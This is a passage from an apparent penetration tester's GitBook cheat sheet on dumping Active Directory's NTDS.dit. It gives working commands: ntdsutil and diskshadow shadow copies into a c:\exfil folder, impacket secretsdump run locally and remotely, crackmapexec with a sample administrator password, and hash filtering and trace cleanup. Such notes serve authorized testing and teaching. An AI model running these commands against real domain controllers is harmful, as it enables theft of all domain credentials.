theAwful
  • Introduction
  • INTERNALS
    • Responder
      • NBNS/LLMNR
    • mitm6
    • Password Spraying
    • CME/NXC Cheatsheet
    • Kerberoasting
    • AS-REP Roasting
    • Dumping NTDS
  • Metasploit Payload and Listener
    • Encoder
    • Word Macros
    • Payloads
      • Earlybird
    • Metasploit Modules
  • OSEP Cheat Sheet
  • OSEP Challenges
    • Challenge 6
  • C2
    • Sliver
  • Privilege Escalation
    • PowerUp
    • Privilege Escalation
      • Internal Privilege Escalation (Linux)
  • Windows Local Recon
    • SQL Server
    • Application Whitelisting and Credentials
  • Linux Local Recon
  • File Transfer & Execution
  • Phishing
  • Ansible/Jfrog
  • Pivoting
  • Pass-the-hash
  • Remote Access
  • Post-Exploitation
    • Add User
    • AMSI, CLM, AppLocker
  • Credentials
  • Lateral Movement
  • Domain Enumeration
    • Users and Computers
    • ACLs
    • BloodHound
    • GPO
    • Trusts
    • User Hunting
  • Active Directory
    • Domain Recon - Kali
    • Domain Recon - Windows
    • Trusts
    • ADCS
      • ESC3
  • Web Application Testing
    • Host Headers
    • WAF Bypasses
    • Template Injection
    • Prototype Pollution
      • Client-side Prototype Pollution
    • Autorize
    • SQLmap
    • SSRF
    • File Uploads
    • Command Injection
    • XXE
      • Blind XXE
    • CSRF
    • XSS
      • XSS Methodology
      • Bypass WAF
  • MOBILE APPS
    • iOS
      • Install Tools
      • SSL Killswitch
    • Android
      • Install Tools
      • Setting up Burp
      • Red Teaming
  • Exploit Dev
    • AMSI Bypass
      • AMSI OpenSession
      • AMSI ScanBuffer
    • VBA Obfsu
    • APC Injection
    • EarlyBird Injection
  • DFIR
    • Malware Analysis
    • Memory Analysis
      • Volatility
    • Registry Analysis
      • RegRipper
    • Behavior Analysis
      • ShellBags
      • UserAssist
    • Filesystems
  • VISUAL STUDIO
    • Tricks
  • Scripts and Tools
    • Grep IPs from DNS ping
    • OSINT.sh
Powered by GitBook
On this page
  • No Credentials - ntdsutil
  • No Credentials - diskshadow
  • With Credentials
  1. INTERNALS

Dumping NTDS

PreviousAS-REP RoastingNextEncoder

Last updated 9 months ago

Grab the NTDS File

  • Get the NTDS file using ntdsutil.exe → https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration

  • Find the script from impacket. (will be at /usr/share/doc/python3-impacket/examples/ )

python secretsdump.py -ntds ntds.dit -system SYSTEM -outputfile clientntds -hashes LMHASH:NTHASH -user-status LOCAL

  • Clean up the hashes using grep and cut, or whatever you want, such that the output only shows the domain users that are enabled. Something along the lines of

cat clientntds | grep Enabled | grep acme.com | cut -d " " -f1 > ntds.txt

  • Move to cracker

  • Make sure you clean up everything (delete shadow file, and ntds and system)

No Credentials - ntdsutil

If you have no credentials, but you have access to the DC, it's possible to dump the ntds.dit using a lolbin ntdsutil.exe:

powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"

We can see that the ntds.dit and SYSTEM as well as SECURITY registry hives are being dumped to c:\temp:

We can then dump password hashes offline with impacket:

root@~/tools/mitre/ntds# /usr/bin/impacket-secretsdump -system SYSTEM -security SECURITY -ntds ntds.dit local

No Credentials - diskshadow

On Windows Server 2008+, we can use diskshadow to grab the ntdis.dit.

Create a shadowdisk.exe script instructing to create a new shadow disk copy of the disk C (where ntds.dit is located in our case) and expose it as drive Z:\

shadow.txt

set context persistent nowriters
set metadata c:\exfil\metadata.cab
add volume c: alias trophy
create
expose %someAlias% z:

...and now execute the following:

mkdir c:\exfil
diskshadow.exe /s C:\users\Administrator\Desktop\shadow.txt
cmd.exe /c copy z:\windows\ntds\ntds.dit c:\exfil\ntds.dit

Below shows the ntds.dit got etracted and placed into our c:\exfil folder:

Inside interactive diskshadow utility, clean up the shadow volume:

diskshadow.exe
    > delete shadows volume trophy
    > reset

With Credentials

If you have credentials for an account that can log on to the DC, it's possible to dump hashes from NTDS.dit remotely via RPC protocol with impacket:

impacket-secretsdump -just-dc-ntlm offense/administrator@10.0.0.6

Using CME

crackmapexec smb 192.168.1.105 -u 'Administrator' -p 'Ignite@987' --ntds drsuapi

secretsdump.py